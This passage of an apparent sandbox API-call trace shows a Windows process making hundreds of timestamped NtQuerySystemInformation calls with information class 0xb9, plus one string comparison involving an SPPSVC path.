ResultLength=0x0) [0297.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x38, ResultLength=0x0) [0297.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x20, ResultLength=0x0) [0297.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x20, ResultLength=0x0) [0297.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x20, ResultLength=0x0) [0297.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x20, ResultLength=0x0) [0297.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecc0, Length=0x38, ResultLength=0x0) [0297.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x20, ResultLength=0x0) [0297.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ead0, Length=0x20, ResultLength=0x0) [0297.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ead0, Length=0x20, ResultLength=0x0) [0297.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb20, Length=0x50, ResultLength=0x0) [0297.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb20, Length=0x50, ResultLength=0x0) [0297.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb20, Length=0x50, ResultLength=0x0) [0297.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x50, ResultLength=0x0) [0297.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x50, ResultLength=0x0) [0297.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x50, ResultLength=0x0) [0297.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x50, ResultLength=0x0) [0297.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e940, Length=0x38, ResultLength=0x0) [0297.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e770, Length=0x28, ResultLength=0x0) [0297.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e770, Length=0x28, ResultLength=0x0) [0297.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e770, Length=0x28, ResultLength=0x0) [0297.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e770, Length=0x28, ResultLength=0x0) [0297.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7e0, Length=0x28, ResultLength=0x0) [0297.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e940, Length=0x38, ResultLength=0x0) [0297.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e860, Length=0x28, ResultLength=0x0) [0297.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e860, Length=0x28, ResultLength=0x0) [0297.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e700, Length=0x20, ResultLength=0x0) [0297.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x20, ResultLength=0x0) [0297.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x20, ResultLength=0x0) [0297.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x20, ResultLength=0x0) [0297.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e940, Length=0x38, ResultLength=0x0) [0297.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e940, Length=0x38, ResultLength=0x0) [0297.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7c0, Length=0x20, ResultLength=0x0) [0297.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0297.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0297.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed80, Length=0x50, ResultLength=0x0) [0297.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed80, Length=0x50, ResultLength=0x0) [0297.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed80, Length=0x50, ResultLength=0x0) [0297.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0297.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0297.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0297.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0297.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0297.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9d0, Length=0x28, ResultLength=0x0) [0297.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9d0, Length=0x28, ResultLength=0x0) [0297.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9d0, Length=0x28, ResultLength=0x0) [0297.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea40, Length=0x28, ResultLength=0x0) [0297.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0297.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0297.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0297.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0297.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x20, ResultLength=0x0) [0297.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x20, ResultLength=0x0) [0297.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x20, ResultLength=0x0) [0297.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x20, ResultLength=0x0) [0297.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0297.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x20, ResultLength=0x0) [0297.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9b0, Length=0x20, ResultLength=0x0) [0297.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9b0, Length=0x20, ResultLength=0x0) [0297.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed80, Length=0x50, ResultLength=0x0) [0297.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed80, Length=0x50, ResultLength=0x0) [0297.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed80, Length=0x50, ResultLength=0x0) [0297.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0297.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0297.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0297.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0297.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0297.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9d0, Length=0x28, ResultLength=0x0) [0297.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9d0, Length=0x28, ResultLength=0x0) [0297.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9d0, Length=0x28, ResultLength=0x0) [0297.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea40, Length=0x28, ResultLength=0x0) [0297.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0297.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0297.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0297.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0297.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x20, ResultLength=0x0) [0297.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x20, ResultLength=0x0) [0297.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x20, ResultLength=0x0) [0297.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x20, ResultLength=0x0) [0297.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0297.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x20, ResultLength=0x0) [0297.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9b0, Length=0x20, ResultLength=0x0) [0297.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9b0, Length=0x20, ResultLength=0x0) [0297.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x50, ResultLength=0x0) [0297.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217edb0, Length=0x28, ResultLength=0x0) [0297.818] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0297.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x50, ResultLength=0x0) [0297.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x50, ResultLength=0x0) [0297.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x50, ResultLength=0x0) [0297.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x38, ResultLength=0x0) [0297.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb90, Length=0x28, ResultLength=0x0) [0297.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb90, Length=0x28, ResultLength=0x0) [0297.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb90, Length=0x28, ResultLength=0x0) [0297.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec00, Length=0x28, ResultLength=0x0) 